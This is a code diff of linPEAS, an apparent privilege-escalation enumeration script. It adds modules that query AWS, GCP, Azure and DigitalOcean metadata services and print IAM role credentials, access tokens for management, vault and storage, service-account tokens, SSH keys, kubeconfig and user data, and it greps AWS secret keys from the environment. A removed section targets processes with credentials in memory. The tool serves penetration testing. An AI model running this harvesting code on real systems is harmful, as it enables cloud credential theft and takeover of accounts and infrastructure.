+if [ "$is_aws_ec2" = "Yes" ]; then
+    print_2title "AWS EC2 Enumeration"
+    
+    HEADER="X-aws-ec2-metadata-token: "
+    URL="http://169.254.169.254/latest/meta-data"
+    
+    aws_req=""
+    if [ "$(command -v curl || echo -n '')" ]; then
+        aws_req="curl -s -f -L -H '$HEADER'"
+    elif [ "$(command -v wget || echo -n '')" ]; then
+        aws_req="wget -q -O - -H '$HEADER'"
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+  
+    if [ "$aws_req" ]; then
+        printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
+        printf "instance-action: "; eval $aws_req "$URL/instance-action"; echo ""
+        printf "instance-id: "; eval $aws_req "$URL/instance-id"; echo ""
+        printf "instance-life-cycle: "; eval $aws_req "$URL/instance-life-cycle"; echo ""
+        printf "instance-type: "; eval $aws_req "$URL/instance-type"; echo ""
+        printf "region: "; eval $aws_req "$URL/placement/region"; echo ""
+
+        echo ""
+        print_3title "Account Info"
+        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/info"; echo ""
+
+        echo ""
+        print_3title "Network Info"
+        for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do 
+          echo "Mac: $mac"
+          printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
+          printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
+          printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
+          echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
+          printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
+          echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
+          printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
+          echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
+          echo ""
+        done
+
+        echo ""
+        print_3title "IAM Role"
+        exec_with_jq eval $aws_req "$URL/iam/info"; echo ""
+        for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do 
+          echo "Role: $role"
+          exec_with_jq eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
+          echo ""
+        done
+        
+        echo ""
+        print_3title "User Data"
+        eval $aws_req "http://169.254.169.254/latest/user-data"; echo ""
+        
+        echo ""
+        print_3title "EC2 Security Credentials"
+        exec_with_jq eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
+        
+        print_3title "SSM Runnig"
+        ps aux 2>/dev/null | grep "ssm-agent" | grep -Ev "grep|sed s,ssm-agent" | sed "s,ssm-agent,${SED_RED},"
+    fi
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/3_AWS_ECS.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/3_AWS_ECS.sh
@@ -0,0 +1,48 @@
+# Title: Cloud - AWS ECS
+# ID: CL_AWS_ECS
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: AWS ECS Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_aws_ecs, exec_with_jq, print_2title, print_3title
+# Global Variables: $aws_ecs_metadata_uri, $aws_ecs_service_account_uri, $is_aws_ecs
+# Initial Functions: check_aws_ecs
+# Generated Global Variables: $aws_ecs_req
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$is_aws_ecs" = "Yes" ]; then
+    print_2title "AWS ECS Enumeration"
+    
+    aws_ecs_req=""
+    if [ "$(command -v curl || echo -n '')" ]; then
+        aws_ecs_req='curl -s -f'
+    elif [ "$(command -v wget || echo -n '')" ]; then
+        aws_ecs_req='wget -q -O -'
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+    if [ "$aws_ecs_metadata_uri" ]; then
+        print_3title "Container Info"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri"
+        echo ""
+        
+        print_3title "Task Info"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_metadata_uri/task"
+        echo ""
+    else
+        echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
+    fi
+
+    if [ "$aws_ecs_service_account_uri" ]; then
+        print_3title "IAM Role"
+        exec_with_jq eval $aws_ecs_req "$aws_ecs_service_account_uri"
+        echo ""
+    else
+        echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
+    fi
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/4_AWS_Lambda.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/4_AWS_Lambda.sh
@@ -0,0 +1,27 @@
+# Title: Cloud - AWS Lambda
+# ID: CL_AWS_Lambda
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: AWS Lambda Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_aws_lambda, print_2title
+# Global Variables: $is_aws_lambda
+# Initial Functions: check_aws_lambda
+# Generated Global Variables: 
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$is_aws_lambda" = "Yes" ]; then
+  print_2title "AWS Lambda Enumeration"
+  printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
+  printf "Region: "; env | grep AWS_REGION
+  printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
+  printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
+  printf "Session token: "; env | grep AWS_SESSION_TOKEN
+  printf "Security token: "; env | grep AWS_SECURITY_TOKEN
+  printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
+  printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/5_AWS_Codebuild.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/5_AWS_Codebuild.sh
@@ -0,0 +1,40 @@
+# Title: Cloud - AWS Codebuild
+# ID: CL_AWS_Codebuild
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: AWS Codebuild Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_aws_codebuild, exec_with_jq, print_2title, print_3title
+# Global Variables: $is_aws_codebuild
+# Initial Functions: check_aws_codebuild
+# Generated Global Variables: $aws_req, $METADATA_URL, $CREDS_PATH, $URL_CREDS
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+if [ "$is_aws_codebuild" = "Yes" ]; then
+  print_2title "AWS Codebuild Enumeration"
+
+  aws_req=""
+  if [ "$(command -v curl || echo -n '')" ]; then
+      aws_req="curl -s -f"
+  elif [ "$(command -v wget || echo -n '')" ]; then
+      aws_req="wget -q -O -"
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+      echo "The addresses are in /codebuild/output/tmp/env.sh"
+  fi
+
+  if [ "$aws_req" ]; then
+    print_3title "Credentials"
+    CREDS_PATH=$(cat /codebuild/output/tmp/env.sh | grep "AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" | cut -d "'" -f 2)
+    URL_CREDS="http://169.254.170.2$CREDS_PATH" # Already has a / at the begginig
+    exec_with_jq eval $aws_req "$URL_CREDS"; echo ""
+
+    print_3title "Container Info"
+    METADATA_URL=$(cat /codebuild/output/tmp/env.sh | grep "ECS_CONTAINER_METADATA_URI" | cut -d "'" -f 2)
+    exec_with_jq eval $aws_req "$METADATA_URL"; echo ""
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_function.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_function.sh
@@ -0,0 +1,57 @@
+# Title: Cloud - Google Cloud Function
+# ID: CL_Google_cloud_function
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Google Cloud Function Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_gcp, print_2title, print_3title, print_info
+# Global Variables: $is_gcp_function, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
+# Initial Functions: check_gcp
+# Generated Global Variables: $gcp_req, $p_id, $p_num, $inst_id, $inst_zone, $mtls_info
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$is_gcp_function" = "Yes" ]; then
+    gcp_req=""
+    if [ "$(command -v curl)" ]; then
+        gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
+    elif [ "$(command -v wget)" ]; then
+        gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+    # GCP Enumeration
+    if [ "$gcp_req" ]; then
+        print_2title "Google Cloud Platform Enumeration"
+        print_info "https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security"
+
+        ## GC Project Info
+        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
+        [ "$p_id" ] && echo "Project-ID: $p_id"
+        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
+        [ "$p_num" ] && echo "Project Number: $p_num"
+
+        # Instance Info
+        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
+        [ "$inst_id" ] && echo "Instance ID: $inst_id"
+        mtls_info=$(eval $gcp_req http://metadata/computeMetadata/v1/instance/platform-security/auto-mtls-configuration)
+        [ "$mtls_info" ] && echo "MTLS info: $mtls_info"
+        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
+        [ "$inst_zone" ] && echo "Zone: $inst_zone"
+
+        echo ""
+        print_3title "Service Accounts"
+        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
+            echo "  Name: $sa"
+            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}email")
+            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}aliases")
+            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}identity")
+            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
+            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/${sa}token")
+            echo "  ==============  "
+        done
+    fi
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_vm.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/6_Google_cloud_vm.sh
@@ -0,0 +1,111 @@
+# Title: Cloud - Google Cloud VM
+# ID: CL_Google_cloud_vm
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Google Cloud VM Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_gcp, print_2title, print_3title, print_info
+# Global Variables: $is_gcp_vm, $GCP_GOOD_SCOPES, $GCP_BAD_SCOPES
+# Initial Functions: check_gcp
+# Generated Global Variables: $gcp_req, $p_id, $p_num, $pssh_k, $p_attrs, $osl_u, $osl_g, $osl_sk, $osl_au, $inst_d, $inst_hostn, $inst_id, $inst_img, $inst_mt, $inst_n, $inst_tag, $inst_zone, $inst_k8s_loc, $inst_k8s_name, $inst_k8s_osl_e, $inst_k8s_klab, $inst_k8s_kubec, $inst_k8s_kubenv, $iface
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$is_gcp_vm" = "Yes" ]; then
+    gcp_req=""
+    if [ "$(command -v curl || echo -n '')" ]; then
+        gcp_req='curl -s -f -L -H "Metadata-Flavor: Google"'
+    elif [ "$(command -v wget || echo -n '')" ]; then
+        gcp_req='wget -q -O - --header "Metadata-Flavor: Google"'
+    else 
+        echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+    fi
+
+
+    if [ "$gcp_req" ]; then
+        print_2title "Google Cloud Platform Enumeration"
+        print_info "https://book.hacktricks.xyz/cloud-security/gcp-security"
+
+        ## GC Project Info
+        p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
+        [ "$p_id" ] && echo "Project-ID: $p_id"
+        p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
+        [ "$p_num" ] && echo "Project Number: $p_num"
+        pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
+        [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
+        p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
+        [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
+
+        # OSLogin Info
+        osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
+        [ "$osl_u" ] && echo "OSLogin users: $osl_u"
+        osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
+        [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
+        osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
+        [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
+        osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
+        [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
+
+        # Instance Info
+        inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
+        [ "$inst_d" ] && echo "Instance Description: "
+        inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
+        [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
+        inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
+        [ "$inst_id" ] && echo "Instance ID: $inst_id"
+        inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
+        [ "$inst_img" ] && echo "Instance Image: $inst_img"
+        inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
+        [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
+        inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
+        [ "$inst_n" ] && echo "Instance Name: $inst_n"
+        inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
+        [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
+        inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
+        [ "$inst_zone" ] && echo "Zone: $inst_zone"
+
+        inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
+        [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
+        inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
+        [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
+        inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
+        [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
+        inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
+        [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
+        inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
+        [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
+        inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
+        [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
+
+        echo ""
+        print_3title "Interfaces"
+        for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do 
+            echo "  IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
+            echo "  Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
+            echo "  Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
+            echo "  DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
+            echo "  Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
+            echo "  ==============  "
+        done
+        
+        echo ""
+        print_3title "User Data"
+        echo $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/startup-script")
+        echo ""
+
+        echo ""
+        print_3title "Service Accounts"
+        for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do 
+            echo "  Name: $sa"
+            echo "  Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
+            echo "  Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
+            echo "  Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
+            echo "  Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
+            echo "  Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
+            echo "  ==============  "
+        done
+    fi
+    echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/7_Azure_VM.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/7_Azure_VM.sh
@@ -0,0 +1,52 @@
+# Title: Cloud - Azure VM
+# ID: CL_Azure_VM
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Azure VM Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_az_vm, exec_with_jq, print_2title, print_3title
+# Global Variables: $is_az_vm
+# Initial Functions: check_az_vm
+# Generated Global Variables: $API_VERSION, $HEADER, $az_req, $URL
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$is_az_vm" = "Yes" ]; then
+  print_2title "Azure VM Enumeration"
+
+  HEADER="Metadata:true"
+  URL="http://169.254.169.254/metadata"
+  API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
+  
+  az_req=""
+  if [ "$(command -v curl || echo -n '')" ]; then
+      az_req="curl -s -f -L -H '$HEADER'"
+  elif [ "$(command -v wget || echo -n '')" ]; then
+      az_req="wget -q -O - -H '$HEADER'"
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$az_req" ]; then
+    print_3title "Instance details"
+    exec_with_jq eval $az_req "$URL/instance?api-version=$API_VERSION"
+
+    print_3title "Load Balancer details"
+    exec_with_jq eval $az_req "$URL/loadbalancer?api-version=$API_VERSION"
+
+    print_3title "Management token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://management.azure.com/"
+
+    print_3title "Graph token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
+    
+    print_3title "Vault token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://vault.azure.net/"
+
+    print_3title "Storage token"
+    exec_with_jq eval $az_req "$URL/identity/oauth2/token?api-version=$API_VERSION\&resource=https://storage.azure.com/"
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/8_Azure_app_service.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/8_Azure_app_service.sh
@@ -0,0 +1,47 @@
+# Title: Cloud - Azure App Service 
+# ID: CL_Azure_app_service
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: Azure App Service Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_az_app, exec_with_jq, print_2title, print_3title
+# Global Variables: $is_az_app,
+# Initial Functions: check_az_app
+# Generated Global Variables: $API_VERSION, $HEADER, $az_req
+# Fat linpeas: 0
+# Small linpeas: 0
+
+
+API_VERSION="2021-12-13" #https://learn.microsoft.com/en-us/azure/virtual-machines/instance-metadata-service?tabs=linux#supported-api-versions
+
+if [ "$is_az_app" = "Yes" ]; then
+  print_2title "Azure App Service Enumeration"
+  echo "I haven't tested this one, if it doesn't work, please send a PR fixing and adding functionality :)"
+
+  HEADER="secret:$IDENTITY_HEADER"
+
+  az_req=""
+  if [ "$(command -v curl || echo -n '')" ]; then
+      az_req="curl -s -f -L -H '$HEADER'"
+  elif [ "$(command -v wget || echo -n '')" ]; then
+      az_req="wget -q -O - -H '$HEADER'"
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$az_req" ]; then
+    print_3title "Management token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://management.azure.com/"
+
+    print_3title "Graph token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://graph.microsoft.com/"
+    
+    print_3title "Vault token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://vault.azure.net/"
+
+    print_3title "Storage token"
+    exec_with_jq eval $az_req "$IDENTITY_ENDPOINT?api-version=$API_VERSION\&resource=https://storage.azure.com/"
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/3_cloud/9_DO_Droplet.sh
+++ b/linPEAS/builder/linpeas_parts/3_cloud/9_DO_Droplet.sh
@@ -0,0 +1,42 @@
+# Title: Cloud - DO Droplet
+# ID: CL_DO_Droplet
+# Author: Carlos Polop
+# Last Update: 22-08-2023
+# Description: DO Droplet Enumeration
+# License: GNU GPL
+# Version: 1.0
+# Functions Used: check_do, print_2title
+# Global Variables: $is_do
+# Initial Functions: check_do
+# Generated Global Variables: $do_req, $URL
+# Fat linpeas: 0
+# Small linpeas: 1
+
+
+if [ "$is_do" = "Yes" ]; then
+  print_2title "DO Droplet Enumeration"
+
+  do_req=""
+  if [ "$(command -v curl || echo -n '')" ]; then
+      do_req='curl -s -f -L '
+  elif [ "$(command -v wget || echo -n '')" ]; then
+      do_req='wget -q -O - '
+  else 
+      echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+  fi
+
+  if [ "$do_req" ]; then
+    URL="http://169.254.169.254/metadata"
+    printf "Id: "; eval $do_req "$URL/v1/id"; echo ""
+    printf "Region: "; eval $do_req "$URL/v1/region"; echo ""
+    printf "Public keys: "; eval $do_req "$URL/v1/public-keys"; echo ""
+    printf "User data: "; eval $do_req "$URL/v1/user-data"; echo ""
+    printf "Dns: "; eval $do_req "$URL/v1/dns/nameservers" | tr '\n' ','; echo ""
+    printf "Interfaces: "; eval $do_req "$URL/v1.json" | jq ".interfaces";
+    printf "Floating_ip: "; eval $do_req "$URL/v1.json" | jq ".floating_ip";
+    printf "Reserved_ip: "; eval $do_req "$URL/v1.json" | jq ".reserved_ip";
+    printf "Tags: "; eval $do_req "$URL/v1.json" | jq ".tags";
+    printf "Features: "; eval $do_req "$URL/v1.json" | jq ".features";
+  fi
+  echo ""
+fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets.sh
@@ -1,380 +0,0 @@
-
-####################################################
-#-----) Processes & Cron & Services & Timers (-----#
-####################################################
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PCS) Cleaned proccesses
-  print_2title "Cleaned processes"
-
-  if [ "$NOUSEPS" ]; then
-    printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
-  fi
-  print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
-
-  if [ -f "/etc/fstab" ] && cat /etc/fstab | grep -q "hidepid=2"; then
-    echo "Looks like /etc/fstab has hidepid=2, so ps will not show processes of other users"
-  fi
-
-  if [ "$NOUSEPS" ]; then
-    print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
-    pslist=$(print_ps)
-  else
-    (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
-      echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
-      if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then
-        cpid=$(echo "$psline" | awk '{print $2}')
-        caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
-        if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
-          printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
-        fi
-      fi
-    done
-    pslist=$(ps auxwww)
-    echo ""
-
-    #-- PCS) Binary processes permissions
-    print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
-    print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
-    binW="IniTialiZZinnggg"
-    ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
-      if [ -w "$bpath" ]; then
-        binW="$binW|$bpath"
-      fi
-    done
-    ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
-  fi
-  echo ""
-fi
-
-CURRENT_USER_PIVOT_PID=""
-if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
-  #-- PCS) Process opened by other users
-  print_2title "Processes whose PPID belongs to a different user (not root)"
-  print_info "You will know if a user can somehow spawn processes as a different user"
-  
-  # Function to get user by PID
-  get_user_by_pid() {
-    ps -p "$1" -o user | grep -v "USER"
-  }
-
-  # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
-  ps -eo pid,ppid,user | grep -v "PPID" | while read -r pid ppid user; do
-    if [ "$ppid" = "0" ]; then
-      continue
-    fi
-    ppid_user=$(get_user_by_pid "$ppid")
-    if echo "$user" | grep -Eqv "$ppid_user|root$"; then
-      echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
-      if [ "$ppid_user" = "$USER" ]; then
-        CURRENT_USER_PIVOT_PID="$ppid"
-      fi
-    fi
-  done
-  echo ""
-fi
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PCS) Files opened by processes belonging to other users
-  if ! [ "$IAMROOT" ]; then
-    print_2title "Files opened by processes belonging to other users"
-    print_info "This is usually empty because of the lack of privileges to read other user processes information"
-    lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
-    echo ""
-  fi
-fi
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  #-- PCS) Processes with credentials inside memory
-  print_2title "Processes with credentials in memory (root req)"
-  print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
